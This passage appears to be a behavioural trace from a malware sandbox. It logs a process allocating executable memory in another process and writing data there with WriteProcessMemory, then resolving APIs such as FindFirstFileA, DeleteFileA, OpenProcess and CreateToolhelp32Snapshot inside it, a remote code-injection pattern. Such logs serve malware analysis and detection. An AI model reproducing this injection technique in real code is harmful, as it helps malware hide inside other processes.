	[0187.813] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.813] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.814] ResetEvent (hEvent=0x478) returned 1
	[0187.814] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.814] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.814] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.814] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.814] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551c4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.814] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.815] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.815] lstrlenA (lpString="GetFileSizeEx") returned 13
	[0187.815] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.815] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7310*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7310*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0187.815] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.815] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.815] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.816] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.816] ResetEvent (hEvent=0x478) returned 1
	[0187.816] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.816] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.816] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.816] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.816] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.816] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551c8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.817] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.817] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.817] lstrlenA (lpString="VirtualQuery") returned 12
	[0187.817] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.817] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7320*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7320*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.817] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.817] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.817] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.818] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.818] ResetEvent (hEvent=0x478) returned 1
	[0187.818] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.818] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.818] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.818] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.818] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.819] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551cc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.819] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.819] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.819] lstrlenA (lpString="FindFirstFileA") returned 14
	[0187.819] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.819] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7330*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7330*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.820] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.820] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.820] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.820] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.820] ResetEvent (hEvent=0x478) returned 1
	[0187.820] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.821] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.821] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.821] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.821] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.821] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551d0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.821] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.821] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.821] lstrlenA (lpString="FindNextFileA") returned 13
	[0187.821] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.822] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7342*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7342*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0187.822] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.822] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.822] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.822] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.823] ResetEvent (hEvent=0x478) returned 1
	[0187.823] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.823] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.823] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.823] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.823] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.823] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551d4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.824] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.824] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.824] lstrlenA (lpString="CreateFileA") returned 11
	[0187.824] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.824] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7352*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7352*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.824] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.824] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.824] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.825] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.825] ResetEvent (hEvent=0x478) returned 1
	[0187.825] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.825] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.825] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.825] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.825] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.826] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551d8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.826] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.826] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.826] lstrlenA (lpString="DeleteFileA") returned 11
	[0187.826] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.826] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7360*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7360*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.827] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.827] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.827] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.827] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.827] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.827] ResetEvent (hEvent=0x478) returned 1
	[0187.827] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.828] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.828] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.828] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.828] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.828] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551dc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.828] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.828] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.828] lstrlenA (lpString="SystemTimeToFileTime") returned 20
	[0187.828] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.828] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb736e*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb736e*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0187.829] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.829] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.829] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.829] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.830] ResetEvent (hEvent=0x478) returned 1
	[0187.830] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.830] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.830] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.830] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.830] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.830] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551e0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.831] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.831] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.831] lstrlenA (lpString="Process32First") returned 14
	[0187.831] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.831] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7386*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7386*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.831] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.831] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.831] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.832] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.832] ResetEvent (hEvent=0x478) returned 1
	[0187.832] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.832] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.832] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.832] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.832] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.832] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551e4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.833] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.833] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.833] lstrlenA (lpString="OpenProcess") returned 11
	[0187.833] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.833] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7398*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7398*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.833] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.833] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.834] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.834] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.834] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.834] ResetEvent (hEvent=0x478) returned 1
	[0187.834] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.834] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.834] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.835] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.835] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551e8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.835] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.835] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.835] lstrlenA (lpString="CreateToolhelp32Snapshot") returned 24
	[0187.835] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.835] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb73a6*, nSize=0x19, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb73a6*, lpNumberOfBytesWritten=0x12857c*=0x19) returned 1
	[0187.836] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.836] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.836] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.836] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.837] ResetEvent (hEvent=0x478) returned 1
	[0187.837] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.837] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.837] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.837] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.837] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
